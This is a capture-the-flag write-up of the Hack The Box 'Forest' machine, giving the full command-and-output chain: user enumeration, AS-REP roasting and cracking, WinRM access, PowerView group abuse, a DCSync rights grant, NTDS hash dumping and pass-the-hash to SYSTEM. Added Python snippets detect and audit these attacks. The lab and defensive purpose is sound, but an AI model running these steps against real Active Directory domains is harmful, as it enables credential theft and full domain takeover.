Dark_Man

HTB - Forest

Enumeration


Scope

IP Address: 10.10.10.161

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ nmap -p- --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
5985/tcp open   wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-08 11:55:21Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-07-08T04:55:24-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s
| smb2-time: 
|   date: 2024-07-08T11:55:26
|_  start_date: 2024-07-08T11:39:10
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
* Open ports: 88 - 135 - 139 - 389 - 445 - 5985
* UDP Open ports: 88 - 123 - 389
* Services:
* Versions:
* Important Notes: Domain: htb.local - Windows Server 2016 Standard 14393 - FQDN: FOREST.htb.local

Enumeration

SMB

SMB enumeration didn't give any useful information.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ smbclient -N -L //$ip                                                                                                           
Anonymous login successful                                                                                                          
        Sharename       Type      Comment
        ---------       ----      -------                                                                                           
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                             
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                                                                      
SMB         10.10.10.161    445    FOREST           [+] htb.local\:
SMB         10.10.10.161    445    FOREST           [-] Error enumerating shares: STATUS_ACCESS_DENIED 

RPC

I managed to enumerate the domain users with rpcclient

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

I have to create a user list and attempt further enumeration.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ cat user | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi

Initial Access


Trying the wordlist we got from RPC enumeration against Kerberos

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ kerbrute userenum --dc $ip -d htb.local -t 100 -o kerbrute.list ./users.lst

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/08/24 - Ronnie Flathers @ropnop

2024/07/08 07:57:51 >  Using KDC(s):
2024/07/08 07:57:51 >   10.10.10.161:88

2024/07/08 07:57:51 >  [+] VALID USERNAME:       Administrator@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxc3d7722@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxc0a90c9@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxfc9daad@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox670628e@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxfd87238@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox83d6781@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxb01ac64@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox6ded678@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox968e74d@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox7108a4e@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       lucinda@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox0659cc1@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       sebastien@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       santi@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       andy@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       mark@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       svc-alfresco@htb.local

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ cat kerbrute.list | awk '{print $7}' | cut -d@ -f1 | tee -a final.lst

Administrator
HealthMailboxc3d7722
HealthMailboxc0a90c9
HealthMailboxfc9daad
HealthMailbox670628e
HealthMailboxfd87238
HealthMailbox83d6781
HealthMailboxb01ac64
HealthMailbox6ded678
HealthMailbox968e74d
HealthMailbox7108a4e
lucinda
HealthMailbox0659cc1
sebastien
santi
andy
mark
svc-alfresco

The next step in my mind is to attempt AS-REP Roasting against the users we found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-GetNPUsers htb.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst 

<snip>
$krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8
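
The same request seen from the domain controller's side, as an added example that is not part of the original write-up: a TGT issued without pre-authentication is logged as Security event 4768 with PreAuthType 0, and the `23` in the hash above is encryption type 0x17 (RC4-HMAC). The event records below are constructed sample data and the function names are assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the "23" in a $krb5asrep$23$ hash

# Constructed sample: EventData fields of Security event 4768 (TGT requested).
SAMPLE_EVENTS = [
    {"TargetUserName": "svc-alfresco", "IpAddress": "::ffff:10.10.16.3",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "sebastien", "IpAddress": "::ffff:10.10.10.20",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # Failed request (0x6 = unknown principal): no ticket, PreAuthType is "-".
    {"TargetUserName": "nosuchuser", "IpAddress": "::ffff:10.10.16.3",
     "PreAuthType": "-", "TicketEncryptionType": "0xFFFFFFFF", "Status": "0x6"},
    {"TargetUserName": "andy", "IpAddress": "::ffff:10.10.10.21",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"},
]


def _source(ip):
    """Strip the IPv4-mapped IPv6 prefix Windows puts in front of addresses."""
    return ip[7:] if ip.startswith("::ffff:") else ip


def asrep_findings(events):
    """Return one finding per TGT that was issued without pre-authentication."""
    findings = []
    for ev in events:
        if int(ev["Status"], 16) != 0:   # request failed, nothing to crack
            continue
        if ev["PreAuthType"] != "0":     # requester proved knowledge of the key
            continue
        etype = int(ev["TicketEncryptionType"], 16)
        findings.append({
            "user": ev["TargetUserName"],
            "source": _source(ev["IpAddress"]),
            # An RC4 reply is the cheapest one to attack offline.
            "severity": "high" if etype == RC4_HMAC else "medium",
        })
    return findings


def users_by_source(events):
    """Group affected accounts by requesting host; many users from one host is a sweep."""
    grouped = defaultdict(set)
    for f in asrep_findings(events):
        grouped[f["source"]].add(f["user"])
    return {src: sorted(users) for src, users in grouped.items()}


def accounts_to_fix(events):
    """Accounts that should have 'Do not require Kerberos preauthentication' cleared."""
    return sorted({f["user"] for f in asrep_findings(events)})


if __name__ == "__main__":
    for finding in asrep_findings(SAMPLE_EVENTS):
        print(finding)
    print(accounts_to_fix(SAMPLE_EVENTS))
```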

I will then fire up hashcat and try to crack this hash

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt 

$krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8f:s3rvice

Session..........: hashcat
Status...........: Cracked

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ evil-winrm -i $ip -u svc-alfresco -p 's3rvice'

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
*Evil-WinRM* PS C:\Users\svc-alfresco> type Desktop\user.txt
c547a655316215e19xxxxxxxxxxxxxxxx

User Flag: c547a655316215e19xxxxxxxxxxxxxxxx


Privilege Escalation

In Active Directory enumeration, I'm used to running bloodhound.py as soon as I obtain valid credentials, but this time it failed, so I uploaded SharpHound.exe to the machine instead

*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe -c All --zipfilename forest

<snip>
2024-07-08T05:22:16.0093511-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 51 MB RAM
2024-07-08T05:22:16.0093511-07:00|INFORMATION|Enumeration finished in 00:00:44.7988005
2024-07-08T05:22:16.1343445-07:00|INFORMATION|SharpHound Enumeration Completed at 5:22 AM on 7/8/2024! Happy Graphing!

I will then start an SMB server and move the generated zip file to my attack host to upload it to the BloodHound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-smbserver -smb2support share . -username blind0bandit -password blind0bandit
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Authenticate the Windows box to my Kali machine and then move the file

*Evil-WinRM* PS C:\Users\svc-alfresco> net use n: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> move 20240708052215_forest.zip n:

First, I searched for the svc-alfresco account and clicked on Reachable High Value Targets, as its value caught my attention

svc-alfresco is a member of Service Accounts, which is a member of PRIVILEGED IT ACCOUNTS, which is a member of ACCOUNT OPERATORS. It's a nested group membership :)

So, I can say that svc-alfresco is a member of the Account Operators group, which is a highly privileged group.

  • Further enumeration of the Account Operators group in BloodHound showed that it has GenericAll on EXCHANGE WINDOWS PERMISSIONS, and that group has WriteDacl on the domain

    • GenericAll: It means I have full control over the object; in our situation, it can be abused by adding ourselves to that group

    • WriteDacl: It means that I can modify the object's discretionary access control list (DACL); in our situation, it can be abused by granting ourselves DCSync rights so we can dump the NTDS database and get the Administrator hash
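
The chain described above, written as an audit over a small directory graph so that the delegation worth reviewing stands out. This is an added example, not part of the original write-up or of BloodHound; the edge list restates the findings in the text, the `sebastien` edge is constructed, and the function names are assumptions.

```python
from collections import deque

# Constructed edge list: (source, right, destination), restating the text above.
EDGES = [
    ("svc-alfresco", "MemberOf", "Service Accounts"),
    ("Service Accounts", "MemberOf", "Privileged IT Accounts"),
    ("Privileged IT Accounts", "MemberOf", "Account Operators"),
    ("Account Operators", "GenericAll", "Exchange Windows Permissions"),
    ("Exchange Windows Permissions", "WriteDacl", "htb.local"),
    ("sebastien", "MemberOf", "Domain Users"),  # constructed: leads nowhere
]

# Rights that let the source act as, or take control of, the destination.
CONTROL_RIGHTS = {"MemberOf", "GenericAll", "WriteDacl"}


def control_path(edges, start, target):
    """Breadth-first search for the shortest chain of control edges, or None."""
    graph = {}
    for edge in edges:
        if edge[1] in CONTROL_RIGHTS:
            graph.setdefault(edge[0].casefold(), []).append(edge)
    goal = target.casefold()
    queue = deque([(start.casefold(), [])])
    seen = {start.casefold()}  # guards against circular group nesting
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for edge in graph.get(node, []):
            nxt = edge[2].casefold()
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [edge]))
    return None


def exposure_report(edges, principals, target):
    """For each principal that reaches the target, name the first ACL edge to review."""
    report = {}
    for principal in principals:
        path = control_path(edges, principal, target)
        if path:
            # Membership hops are inherited; the first non-membership edge
            # is the delegation that turns group nesting into control.
            acl_edge = next((e for e in path if e[1] != "MemberOf"), None)
            report[principal] = {"hops": len(path), "review": acl_edge}
    return report


if __name__ == "__main__":
    for src, right, dst in control_path(EDGES, "svc-alfresco", "htb.local"):
        print(f"{src} -[{right}]-> {dst}")
    print(exposure_report(EDGES, ["svc-alfresco", "sebastien"], "htb.local"))
```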

We can use PowerView.ps1 to abuse both GenericAll and WriteDacl, but I will use it only for GenericAll and use the DCSync tool developed by n00py to make the attack easier

The main reason I didn't use PowerView to modify the DACL is that I struggled with this machine before: there is a script that resets everything to the default settings, and even if you're fast, you might fail

Clone the repository from GitHub into the /opt directory

┌──(kali㉿kali)-[/opt]
└─$ sudo git clone https://github.com/n00py/DCSync.git  

Use the net command to see the current group membership

*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco

<snip>
Global Group memberships     *Domain Users         *Service Accounts

Execute the following commands to add ourselves to the EXCHANGE WINDOWS PERMISSIONS group

*Evil-WinRM* PS C:\Users\svc-alfresco> upload PowerView.ps1

import-module .\PowerView.ps1
$pass = ConvertTo-SecureString -Force -AsPlainText 's3rvice'
$cred = New-Object System.Management.Automation.PSCredential("htb.local\svc-alfresco", $pass)
Add-DomainGroupMember -Identity 'EXCHANGE WINDOWS PERMISSIONS' -Members 'svc-alfresco' -Credential $cred

Verify

*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco

<snip>
Global Group memberships     *Exchange Windows Perm*Domain Users
                             *Service Accounts
The command completed successfully.

  • DCSync.py needs some options that we have to collect

    • FQDN

    • distinguishedname

We already got the FQDN from the earlier Nmap script scan => Forest.htb.local

And the distinguishedname we can get using PowerView

*Evil-WinRM* PS C:\Users\svc-alfresco> Get-DomainUser -Identity svc-alfresco | select-Object -Property distinguishedname

distinguishedname
-----------------
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local

Now, we're ready to start the attack.

I run the tool and fire up crackmapexec in a one-liner because, as I said before, there is a script that resets the settings

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ python3 /opt/DCSync/DCSync.py -dc forest.htb.local -t "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local"  htb.local\\svc-alfresco:'s3rvice'; crackmapexec smb $ip -u svc-alfresco -p 's3rvice' --ntds

[*] Starting DCSync Attack against CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
[*] Initializing LDAP connection to forest.htb.local
[*] Using htb.local\svc-alfresco account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20240708-102656.restore
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.10.10.161    445    FOREST           [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         10.10.10.161    445    FOREST           [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.161    445    FOREST           htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb4xxxxxxxxxxxxxx:::
<snip>
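
The replication rights granted in the tool output above are the thing to audit on the domain object. As an added example that is not part of the original write-up or of the DCSync tool, the check below flags principals outside an expected set that hold the replication extended rights; the ACE records are constructed sample data, and the allow-list, the `backup-svc` account and the function name are assumptions.

```python
from collections import defaultdict

# Control access right GUIDs from the Active Directory schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
DCSYNC_SET = set(REPLICATION_RIGHTS.values())  # both are needed to pull secrets

# Assumption: principals expected to replicate; adjust for the environment.
EXPECTED = {
    "domain controllers", "enterprise domain controllers",
    "administrators", "domain admins", "enterprise admins",
}

# Constructed sample: object-specific ACEs exported from the domain head's DACL.
SAMPLE_ACES = [
    {"principal": "HTB\\Domain Controllers", "type": "allow",
     "object_type": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\svc-alfresco", "type": "allow",
     "object_type": "1131F6AA-9C07-11D1-F79F-00C04FC2DCD2"},  # upper-case export
    {"principal": "HTB\\svc-alfresco", "type": "allow",
     "object_type": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\backup-svc", "type": "allow",
     "object_type": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\mark", "type": "deny",
     "object_type": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
]


def unexpected_replication_rights(aces, expected=EXPECTED):
    """Map each unexpected principal to the replication rights it was granted."""
    held = defaultdict(set)
    for ace in aces:
        right = REPLICATION_RIGHTS.get(ace["object_type"].lower())
        if ace["type"] != "allow" or right is None:
            continue
        name = ace["principal"].split("\\")[-1].casefold()
        if name not in expected:
            held[ace["principal"]].add(right)
    # "dcsync" is True only when the principal holds the full pair.
    return {p: {"rights": sorted(r), "dcsync": r >= DCSYNC_SET}
            for p, r in held.items()}


if __name__ == "__main__":
    for principal, info in unexpected_replication_rights(SAMPLE_ACES).items():
        print(principal, info)
```

Only explicit object-specific ACEs are checked here; full control or an all-extended-rights ACE on the domain object confers the same rights and needs its own check.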

Access the machine as SYSTEM

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :32693b11e6aa90eb4xxxxxxxxxxxxxx
<snip>
C:\Windows\system32> 

And finally get the root flag :)

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt
689637a422c46e0e07xxxxxxxxxxxxxxxxxxx

Root Flag: 689637a422c46e0e07xxxxxxxxxxxxxxxxxxx


Last updated 11 months ago
